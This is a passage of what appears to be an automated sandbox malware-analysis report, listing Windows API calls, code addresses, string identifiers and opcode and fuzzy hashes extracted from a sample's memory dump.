• ScreenToClient.USER32(00000000), ref: 0030A6A3
• GetClassNameW.USER32(?,?,00000100), ref: 0030A71D
• _wcscmp.LIBCMT ref: 0030A731
• GetWindowTextW.USER32(?,?,00000400), ref: 0030A757
• _wcscmp.LIBCMT ref: 0030A76B
  • Part of subcall function 002D362C: _iswctype.LIBCMT ref: 002D3634
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
• Opcode ID: 6067c4c36cee3620b8a3e17e70b8ec447738e404dd95e6c08e2ea1765bc4cffe
• Instruction ID: c80cd3db7f2c49a273a28630ab99ae0c2fba484cd6afefd53f0a2cc3cedff2fe
• Opcode Fuzzy Hash: 6067c4c36cee3620b8a3e17e70b8ec447738e404dd95e6c08e2ea1765bc4cffe
• Instruction Fuzzy Hash: A4A10131205B06AFC71ADF60D894FEAB7E8FF44754F008629F999D2190DB30E955CB92
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0030AF18
• _wcscmp.LIBCMT ref: 0030AF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0030AF51
• CharUpperBuffW.USER32(?,00000000), ref: 0030AF6E
• _wcscmp.LIBCMT ref: 0030AF8C
• _wcsstr.LIBCMT ref: 0030AF9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 0030AFD5
• _wcscmp.LIBCMT ref: 0030AFE5
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0030B00C
• GetClassNameW.USER32(00000018,?,00000400), ref: 0030B055
• _wcscmp.LIBCMT ref: 0030B065
• GetClassNameW.USER32(00000010,?,00000400), ref: 0030B08D
• GetWindowRect.USER32(00000004,?), ref: 0030B0F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 3bfc30a145d81c68cabaf523e75f5421ab94128816049fe0ac061bcec0016300
• Instruction ID: c1707f76b08e0862bd7356b0f66dcb9c036275441a0c8939dbcbd1d7ad7637c0
• Opcode Fuzzy Hash: 3bfc30a145d81c68cabaf523e75f5421ab94128816049fe0ac061bcec0016300
• Instruction Fuzzy Hash: CA81BF711093069FDB06DF14D8A1FAABBE8EF44354F04846AFD859A0D5DB30DD89CBA2
APIs
  • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
• DragQueryPoint.SHELL32(?,?), ref: 0033C627
  • Part of subcall function 0033AB37: ClientToScreen.USER32(?,?), ref: 0033AB60
  • Part of subcall function 0033AB37: GetWindowRect.USER32(?,?), ref: 0033ABD6
  • Part of subcall function 0033AB37: PtInRect.USER32(?,?,0033C014), ref: 0033ABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 0033C690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0033C69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0033C6BE
• _wcscat.LIBCMT ref: 0033C6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0033C705
• SendMessageW.USER32(?,000000B0,?,?), ref: 0033C71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 0033C735
• SendMessageW.USER32(?,000000B1,?,?), ref: 0033C757
• DragFinish.SHELL32(?), ref: 0033C75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0033C851
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb7
• API String ID: 169749273-563541782
• Opcode ID: 8eeed1d3ead24d0649e24a0092c04a55d1de7f11e70bce502c65f971fbca4427
• Instruction ID: 4fd256950431f319844973d1edbc728ec0981dbdef70a333f1c554e06f20afbe
• Opcode Fuzzy Hash: 8eeed1d3ead24d0649e24a0092c04a55d1de7f11e70bce502c65f971fbca4427
• Instruction Fuzzy Hash: C3617B71508301AFC702EF64CC85DAFBBF8EF89750F40492EF595961A1DB709A49CB52
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: dbbf4fcac0ac82de93e7c7e5f44606cafcb8448b58ecdedd82259a6318980baf
• Instruction ID: bdb81021636b8cc4a13f700396f725b996a057cdaa976e53da1970efc74dc0b3
• Opcode Fuzzy Hash: dbbf4fcac0ac82de93e7c7e5f44606cafcb8448b58ecdedd82259a6318980baf
• Instruction Fuzzy Hash: AD31C530558705A7EA16FBA0ED13EEE77689F10794F604429F401B12D5EF516F24CE52
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00325013
• LoadCursorW.USER32(00000000,00007F00), ref: 0032501E
• LoadCursorW.USER32(00000000,00007F03), ref: 00325029
• LoadCursorW.USER32(00000000,00007F8B), ref: 00325034
• LoadCursorW.USER32(00000000,00007F01), ref: 0032503F
• LoadCursorW.USER32(00000000,00007F81), ref: 0032504A
• LoadCursorW.USER32(00000000,00007F88), ref: 00325055
                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00325060
                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0032506B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00325076
                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00325081
                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0032508C
                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00325097
                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 003250A2
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 003250AD
                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 003250B8
                                                                                                                    • GetCursorInfo.USER32(?), ref: 003250C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2577412497-0
                                                                                                                    • Opcode ID: 9bac4798a59032d773152c8764420437d0be4d3e1d22a4dc4c8ec42277d85646
                                                                                                                    • Instruction ID: a2559251cc93b03a61d0604de0928d268dff9288133f3a4dc7fb26cf5bc3ebe0
                                                                                                                    • Opcode Fuzzy Hash: 9bac4798a59032d773152c8764420437d0be4d3e1d22a4dc4c8ec42277d85646
                                                                                                                    • Instruction Fuzzy Hash: 9231D2B1D483196ADF119FB69C899AEBFE8FF04750F50452AE50DE7280DA78A500CFA1
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0033A259
                                                                                                                    • DestroyWindow.USER32(?,?), ref: 0033A2D3
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0033A34D
                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0033A36F
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0033A382
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0033A3A4
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002B0000,00000000), ref: 0033A3DB
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0033A3F4
                                                                                                                    • GetDesktopWindow.USER32 ref: 0033A40D
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0033A414
                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0033A42C
                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0033A444
                                                                                                                      • Part of subcall function 002B25DB: GetWindowLongW.USER32(?,000000EB), ref: 002B25EC
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                    • Opcode ID: ea7470a0cce9857f0b87242a11000a2de1a24548d2bbfab09f544451067a9958
                                                                                                                    • Instruction ID: 515c79250a6bd0b46a1ae443a7fdd44a55201ab7945bc3ebda07cacb5905a72a
                                                                                                                    • Opcode Fuzzy Hash: ea7470a0cce9857f0b87242a11000a2de1a24548d2bbfab09f544451067a9958
                                                                                                                    • Instruction Fuzzy Hash: 5371AC71640704AFD726CF28CC89FAA7BE9FB88304F45452DF985872A0C7B0E942CB52
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00334424
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0033446F
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                    • Opcode ID: 0cf13e15ee60fc3f46f108d8b059f3b81a094035a68bf117680483fad6f23aac
                                                                                                                    • Instruction ID: 5f7a3220c4f6db6349a0cdbde2a40bd512e9a87168f72e9cc74220f2094b2f93
                                                                                                                    • Opcode Fuzzy Hash: 0cf13e15ee60fc3f46f108d8b059f3b81a094035a68bf117680483fad6f23aac
                                                                                                                    • Instruction Fuzzy Hash: 28919E742143019FCB05EF10C492BAEB7E5AF96390F058869F9925B7A2CB30FD59CB81
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0033B8B4
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003391C2), ref: 0033B910
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0033B949
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0033B98C
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0033B9C3
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0033B9CF
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0033B9DF
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,003391C2), ref: 0033B9EE
                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0033BA0B
                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0033BA17
                                                                                                                      • Part of subcall function 002D2EFD: __wcsicmp_l.LIBCMT ref: 002D2F86
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                    • Opcode ID: 28b7bbaa14a77ea5649d1e18f22b20953e2ac4c81a34230c5ce0e9bf51a2f71f
                                                                                                                    • Instruction ID: e9574b9ccebfb864ce0802afacbea693d5a44fb3dfbecb9833788bc962e81478
                                                                                                                    • Opcode Fuzzy Hash: 28b7bbaa14a77ea5649d1e18f22b20953e2ac4c81a34230c5ce0e9bf51a2f71f
                                                                                                                    • Instruction Fuzzy Hash: 7761DF71900219FEEB16DF64CC81FBEBBACEB08710F108516FA15DA1D1DB75A990DBA0
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0031DCDC
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0031DCEC
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0031DCF8
                                                                                                                    • __wsplitpath.LIBCMT ref: 0031DD56
                                                                                                                    • _wcscat.LIBCMT ref: 0031DD6E
                                                                                                                    • _wcscat.LIBCMT ref: 0031DD80
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0031DD95
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DDA9
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DDDB
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DDFC
                                                                                                                    • _wcscpy.LIBCMT ref: 0031DE08
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0031DE47
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 3566783562-438819550
                                                                                                                    • Opcode ID: 50edea8f028251d44188a7af02b17086dd8e5ad6439579458b9c1efaf2214148
                                                                                                                    • Instruction ID: c4005ec864113ca6af2be57af66e3230342da492ccb665ab8560f30c04e3ba0d
                                                                                                                    • Opcode Fuzzy Hash: 50edea8f028251d44188a7af02b17086dd8e5ad6439579458b9c1efaf2214148
                                                                                                                    • Instruction Fuzzy Hash: 306159765042059FCB15EF20C8849EEB3E8BF8A314F04892AF98987251DB31E995CF92
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00319C7F
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00319CA0
                                                                                                                    • __swprintf.LIBCMT ref: 00319CF9
                                                                                                                    • __swprintf.LIBCMT ref: 00319D12
                                                                                                                    • _wprintf.LIBCMT ref: 00319DB9
                                                                                                                    • _wprintf.LIBCMT ref: 00319DD7
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 311963372-3080491070
                                                                                                                    • Opcode ID: e5cd52e426100b92a971f27dcb19abb04a7b6e13863b05aa70fc5983c40ad5c6
                                                                                                                    • Instruction ID: eb2b272f983b421311352756b163ea8ac80d988cb940d7bf5e1896e7ae2c32cd
                                                                                                                    • Opcode Fuzzy Hash: e5cd52e426100b92a971f27dcb19abb04a7b6e13863b05aa70fc5983c40ad5c6
                                                                                                                    • Instruction Fuzzy Hash: 5751B431910509AECF1AEBE0DD56EEEB778AF08340F500566F505720A2DB316FA9CF61
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0031A3CB
                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0031A418
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0031A460
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0031A497
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0031A4C5
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                    • Opcode ID: 90ceae1f2018c239dd6c833023047f80957a856f1a87785c38ccacec3c6b6545
                                                                                                                    • Instruction ID: 165cf7736a737f02faa28d2eedc5bc1b2ad6fcfb070d36ea4bd69aaac8bddc73
                                                                                                                    • Opcode Fuzzy Hash: 90ceae1f2018c239dd6c833023047f80957a856f1a87785c38ccacec3c6b6545
                                                                                                                    • Instruction Fuzzy Hash: EB518E711147049FC705EF20C8819AAB7F8EF98758F00896DF896972A1DB31ED5ACF82
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,002EE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0030F8DF
                                                                                                                    • LoadStringW.USER32(00000000,?,002EE029,00000001), ref: 0030F8E8
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,002EE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0030F90A
                                                                                                                    • LoadStringW.USER32(00000000,?,002EE029,00000001), ref: 0030F90D
                                                                                                                    • __swprintf.LIBCMT ref: 0030F95D
                                                                                                                    • __swprintf.LIBCMT ref: 0030F96E
                                                                                                                    • _wprintf.LIBCMT ref: 0030FA17
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0030FA2E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 984253442-2268648507
                                                                                                                    • Opcode ID: 1327bd096a5db0f788ed318c494a64cee328a6fa27f29426edc102fa35e63eaa
                                                                                                                    • Instruction ID: 183d179a350bc18c9d657d2deab512bb69d4cf9a295501338ce276c5b795c0e3
                                                                                                                    • Opcode Fuzzy Hash: 1327bd096a5db0f788ed318c494a64cee328a6fa27f29426edc102fa35e63eaa
                                                                                                                    • Instruction Fuzzy Hash: 08416B72910219AACF15FBE0CD96EEEB77CAF58340F500065F505B6092EB316F29CEA1
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00339207,?,?), ref: 0033BA56
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BA6D
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BA78
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BA85
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0033BA8E
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BA9D
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0033BAA6
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BAAD
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00339207,?,?,00000000,?), ref: 0033BABE
                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00342CAC,?), ref: 0033BAD7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0033BAE7
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0033BB0B
                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0033BB36
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0033BB5E
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0033BB74
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 9174630da458fe190ec0d0d922bbbbc01a87d2c8eb129f4148faaf151855a40f
                                                                                                                    • Instruction ID: f4f901b505991855402bbd5b146f113743ce9dc532ab751c773cc4cf709fd03e
                                                                                                                    • Opcode Fuzzy Hash: 9174630da458fe190ec0d0d922bbbbc01a87d2c8eb129f4148faaf151855a40f
                                                                                                                    • Instruction Fuzzy Hash: 09410975A00204EFDB129F65DC88EABBBBCEF89711F514069F909DB260DB309E41DB60
                                                                                                                    APIs
                                                                                                                    • __wsplitpath.LIBCMT ref: 0031DA10
                                                                                                                    • _wcscat.LIBCMT ref: 0031DA28
                                                                                                                    • _wcscat.LIBCMT ref: 0031DA3A
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0031DA4F
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DA63
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0031DA7B
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0031DA95
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031DAA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                    • Opcode ID: f63f709f7cfe62ca4ea7315e9522a8c3027434b89a19321be6d2a8cef4bc2e5a
                                                                                                                    • Instruction ID: 3aaf4ac7d4fe862784481884a06e11b327513ca4f748bd311a0a1ff51f722f8a
                                                                                                                    • Opcode Fuzzy Hash: f63f709f7cfe62ca4ea7315e9522a8c3027434b89a19321be6d2a8cef4bc2e5a
                                                                                                                    • Instruction Fuzzy Hash: 8A8193715042459FCB29DF64C8449EEB7E8AF8E350F15892EF88ACB251E734ED84CB52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0033C1FC
                                                                                                                    • GetFocus.USER32 ref: 0033C20C
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0033C217
                                                                                                                    • _memset.LIBCMT ref: 0033C342
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0033C36D
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0033C38D
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0033C3A0
                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0033C3D4
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0033C41C
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0033C454
                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0033C489
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
